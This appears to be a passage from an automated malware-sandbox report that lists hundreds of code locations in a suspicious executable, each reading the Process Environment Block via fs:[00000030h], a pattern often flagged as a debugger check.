          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0167B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01734015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01734015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01669080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0166DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01693B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01693B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0166DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01738B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0166F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0172131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_017123E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_017123E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_017123E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01694BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01694BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01694BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01735BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01671B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01671B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0171D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0172138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01692397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0171B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0171B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01738A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01669240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0172EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016F4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0172AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0172AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01678A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0166AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0166AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01683A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01665210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01665210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01665210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01665210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01692AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01724AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01692ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0167AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0167AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01713D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01687D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01738D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0172E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01694D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01694D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01694D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01673D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0166AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01718DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0167D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0167D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0172FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_016935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01691DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01691DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01691DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_017305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_017305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01692581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01662D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_01722D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0168746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 2_2_0169AC7B mov eax, dword ptr fs:[00000030h]
